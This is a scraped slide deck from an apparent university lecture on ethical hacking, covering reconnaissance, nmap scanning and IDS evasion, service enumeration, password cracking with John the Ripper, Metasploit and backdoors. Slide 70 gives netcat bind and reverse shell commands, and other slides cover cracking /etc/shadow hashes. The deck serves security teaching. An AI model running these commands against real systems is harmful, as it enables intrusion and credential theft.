Download presentation
Presentation is loading. Please wait.
Published byEliza Dopkins Modified over 9 years ago
1
Dr. Igor Santos
2
¿What is Ethical Hacking? Phases Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration Vulnerabilities Identification & Exploitation 2
3
¿What is Ethical Hacking? 3
4
A method to evaluate the security of a system or a network of systems by simulating an intruder attack It shows the actual impact of a vulnerability through controled tests It searchs for unknown vulnerabilities 4
5
Information level White Box Black Box ¿Social Engineering? ¿Physical Security? ¿Dangerous Tests? Exploits DoS … 5
6
Information Gathering 6
7
Gather information about the target before the attack Without (too much) contact As much information as possible The information can be very valuable in the future More information = More probability of success in the attack 7
8
Information we search for: Names and/or Positions of workers E-mail addresses User names Public Addresses, Domains or URLs Used Software and Technologies Internal addresses or URLs Internal PATHs Data about the system configuration 8
9
Client and supplier names Physical Location Telephone Number … Iterative process When information is found, new searches are performed 9
10
Sources Search Engines DNS servers Whois servers Metadata Social Networks P2P networks … 10
11
Passive Methods The target is not contacted directly ▪ Search Engines ▪ Whois ▪ … Active Methods It leaves some trace in the target ▪ DNS zone transfer ▪ Web site Mirroring ▪ … 11
12
Internet Service Registration (whois) Information about IP record and maintenance Search Engines Gather public information from company and workers web sites 12
13
DNS queries Identification of hosts by DNS querying Web site analysis Intentionally published information, that may suppose a risk for the security 13
14
New sources!!! Social Networks Metadata P2P networks Work searching websites 14
15
Google Hacking: Search in Google sensitive information, usually with malicious goals Johnny Long Google Hacking For Penetration Testers http://www.hackersforcharity.org/ghdb/ http://www.hackersforcharity.org/ghdb/ ▪ No mantenida http://www.exploit-db.com/google-dorks/ http://www.exploit-db.com/google-dorks/ ▪ Continuación!!! (9 nov. 2010) Cheat-sheet http://www.sans.org/mentor/GoogleCheatSheet.pdf 15
16
¿What to look for? Vulnerable applications (e.g.,: inurl:eStore/index.cgi?) Error Messages (e.g.,: “Warning: mysql_query()” “invalid query”) Files with sensitive information (e.g.,: filetype:sql “insert into”) Websites with private reports (e.g.,: intitle:”Nessus Scan Report”) Web server versions (e.g.,: “Microsoft-IIS/* server at”, intitle:index.of) 16
17
http://www.shodanhq.com/ http://www.shodanhq.com/ A “diferent” search engine If finds systems by performing searches based on the banner responses ▪ Computer search engine Filters: http://www.shodanhq.com/help/filtershttp://www.shodanhq.com/help/filters Examples: ▪ net:130.206.139.0/24 ▪ port:22 country:ES 17
18
Netcraft (http://news.netcraft.com)http://news.netcraft.com It shows the following domain information given a domain ▪ OS version. ▪ Web server version ▪ Uptime 18
19
Countermeasures To properly configure the “robots.txt” file ▪ This file indicates to search engines what the must NOT index Periodically audit the web site with these techniques in order to check that there is no access to sensitive information 19
20
¿Who does have a profile in Facebook or LinkedIn? ¿Do we know how to handle privacity in social networks? Social Engineering Create a fake profile in order to obtain access to private profiles = ¡Lot of information! Social Network Search Engines ▪ http://www.123people.com/ http://www.123people.com/ ▪ http://www.pipl.com/ http://www.pipl.com/ 20
21
Countermeasures Limit the presence in social networks Don’t publish too much Don’t publish automatically Don’t accept every friendship request (we may not be the final victim but an attack vector) 21
22
Hidden information regarding a document Author Used Application Date of Creation Camera Model (images) E-mail Addresses … They enhance the information present in a document 22
23
A tool that started by being a metadata extractor and analyzer, now is more than that: Document panel: Searches several types of documents in Google, Bing and Exaled DNS Search Panel : It uses different techniques to obtain more domain names Countermeasures: Metashield Protector It cleans the metadata from documents 23
24
Network Mapping & Scanning 24
25
Several techniques Host discovery Port scanning IDS (Intrusion Detection System) evasion Service and OS identification (fingerprinting) 25
26
Nmap Tool for network exploration and security auditing nmap [.][ ] { } Options ▪ Scan type: -sS, -sX, -sU, … ▪ -p : ports to scan (separated by a comma or “-” for range) (to scan all of them –p 0-65535) 26
27
Zenmap Front-end for nmap It draws a network map with the results Predefined scans 27
28
Manual http://nmap.org/man/es/man-briefoptions.html Cheat sheet http://sbdtools.googlecode.com/files/Nmap5% 20cheatsheet%20eng%20v1.pdf Book http://nmap.org/book/ 28
29
Identify online systems First step for network mapping Classic method using ping ICMP echo request Alive systems respond to ICMP echo reply It is also possible to send TCP packets and wait for the response of the online ARP Ping in local networks 29
30
Nmap ping (-sP) ICMP echo request & ICMP timestamp request TCP ACK packet port 80 TCP SYN packet port 443 Example: nmap –sP 192.168.1.1 30
31
One of the most widespread hacking techniques Nmap en Hollywood http://nmap.org/movies.html A computer executes several services that listen in tcp/udp ports By means of scanning, we can locate open ports 31
32
TCP Connect scan A TCP connection is established with the destination port (Three-Way Handshake) A very reliable method to determine the port state Simple and easy to detect ▪ Generates too much noise nmap –sT -p 32
33
Open port 33
34
Closed port 34
35
Filtered port 35
36
SYN scan If a port listening is found, the full connection is not established ▪ A RST is sent to finalize it Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt A IDS can easily detect it Quick and realiable nmap –sS -p 36
37
Open port 37
38
Closed port 38
39
Filtered port 39
40
UDP is a protocal not connection oriented Closed ports return the packet “ICMP destination unreachable” If the ICMP traffic is filtered the responsed are not retrieved for the closed ports The port state cannot be determined conclusively nmap –sU -p 40
41
Open/Filtered port 41
42
Closed port 42
43
Techniques to avoid IDS/IPS Use of fragmented packets ▪ Distribution of an IP packet between various data blocks nmap -sS -f -p Spoofing of origin IPs to emulate multiple attackers ▪ Hiding our own IP (attacker) nmap –sS –D -p 43
44
Service Fingerprinting Identification of the service listening in a port TCP/UDP nmap –sV -p O.S. Fingerprinting Identification of the Operative System nmap –O 44
45
Disable unnecessary services Close ports Firewall / IDS / IPS ICMP traffic filtering 45
46
Enumeration 46
47
Get information through a network service What information? System user names Email addresses other systems ... 47
48
Services FTP: anonymous / Ftp-user-enum TFTP: ¡without authentication! SMTP: VRFY y EXPN commands → smtpenum DNS: Direct/Reverse Lookup y zone transfer HTTP: banner grabbing RPC: edump, rpcdump, rpcinfo NETBIOS: samrdump SNMP: snmpwalk, snmpheck LDAP: Brute force by means of the Guest user 48
49
Maintain the services updated Disable unnecessary services 49
50
ATAQUES A CONTRASEÑAS Passwords Attacks 50
51
It is unknown some or all the necessary data to authenticate User (if the Information Gathering phase has been correctly done, we will have several system users) Password The password file is known, but it is encrypted Words are test until the correct one is found 51
52
Systems store a password Hash They do not store clear users' passwords One-way encryption function It cannot be decrypted ▪ http://en.wikipedia.org/wiki/Cryptographic_hash_functi on http://en.wikipedia.org/wiki/Cryptographic_hash_functi on 52
53
During a pentest we will collect password hashes Bad configurations Successful intrusion With administrative permission is possible to dump the hashes of the passwords of system users Windows -> SAM Unix -> / etc / passwd, / etc / shadow 53
54
Dictionary It is based on a list of user names or passwords Common Words Terms related to the audited Try until the right one is found It should be on the list! Success depends on how good and / or extensive is the dictionary / pentest / passwords / wordlists 54
55
Hybrid It uses a dictionary, but variations are also introduced Examples Try dictionary words in lowercase and uppercase A is changed by 4, S by 5, E by 3,... 55
56
Brute Force Usernames or passwords are generated within a rank and given a character set ▪ Eg max 8 characters [A-Za-z] 56
57
Password cracking tool Able to break several algorithms DES MD5 SHA-1 LM (Lan Manager) ... You can save a session for later cracking 57
58
Single mode Quick test Difficult to have success It uses typical passwords and some variations john --single 58
59
Wordlist Mode It tests with a dictionary file Quick Hybrid attack: --rules john --wordlist= Dictionaries /pentest/passwords/wordlists/ 59
60
Incremental Mode It tries all possible combinations of passwords (Brute Force) ▪ Only letters (--incremental:alpha) ▪ Only numbers (--incremental:digits) ▪ Letters, numbers and some special characters (--incremental:lanman) ▪ All characters (--incremental:all) john --incremental:[mode] 60
61
Show cracked hashes john --show /etc/shadow 61
62
Shoulder surffing Social Engineering Sniffing Capture the session logins Physical access Bypass -> konboot Password cracking 0phcrack live cd (Rainbow Tables) 62
63
Vulnerabilities Identification & Exploitation 63
64
Terminology Vulnerability Exploit (client-side, server-side, …) 0-day exploit Payload CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/ http://cve.mitre.org/ 64
65
Lots of vulnerabilities types: Configuration (not design) Input validation Directory Jump Command Injection SQL Injection Cross-site scripting (XSS) Buffer overflow … 65
66
Vulnerability Search Security Focus ▪ http://www.securityfocus.com/vulnerabilities http://www.securityfocus.com/vulnerabilities National Vulnerability Database ▪ http://web.nvd.nist.gov/view/vuln/search http://web.nvd.nist.gov/view/vuln/search CERT ▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilitie s_1/vulnerability_search/?postAction=getVulns http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilitie s_1/vulnerability_search/?postAction=getVulns Microsoft Security Bulletins ▪ http://www.microsoft.com/spain/technet/security/bulletin/ms 10-oct.mspx http://www.microsoft.com/spain/technet/security/bulletin/ms 10-oct.mspx Scanners: Secunia, Nessus, etc. 66
67
Exploits Search Exploit Database ▪ Milw0rm continuation. ▪ http://www.exploit-db.com/ http://www.exploit-db.com/ Others ▪ http://www.securiteam.com/exploits http://www.securiteam.com/exploits ▪ http://securityvulns.com/exploits http://securityvulns.com/exploits ▪ http://www.web-hack.ru/exploit http://www.web-hack.ru/exploit ▪ http://tarantula.by.ru/localroot http://tarantula.by.ru/localroot 67
68
Metasploit Framework for vulnerbility explotation It help in the development of new exploits It allows to define ▪ What exploit is going to be used ▪ Which payload is going to be launched lanzará ▪ Meterpreter: advanced payload without disk access (DLL Injection) → less forensics evidences. ▪ How is going to be coded (avoiding IDS, etc.) 68
69
Mantaining the access– Backdoors Tiny Shell: Unix backdoor Hydrogen: backdoor from Immunitysec ▪ It includes robust encryption and traffic hiding Radmin: Windows backdoor ▪ A remote desktop like connection. Very easy to use and with a lot of functions 69
70
Netcat: it can be used as backdoor ▪ Victim (server): nc -lp 4444 –e cmd.exe ▪ Attacker (client): nc –vv 4444 ▪ Also “reverse shell”: ▪ Attacker (client): nc –vvlp 4444 ▪ Victim (server): nc –vv 4444 –e cmd.exe 70
71
Images RTVE http://www.flickr.com/photos/anonymous9000/2663311366 http://www.flickr.com/photos/anonymous9000/2663311366 The Matrix, Warner Bros. http://www.flickr.com/photos/venosdale/4412225367 http://www.flickr.com/photos/venosdale/4412225367 http://www.flickr.com/photos/melancon/2283719035 http://www.flickr.com/photos/melancon/2283719035 71
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.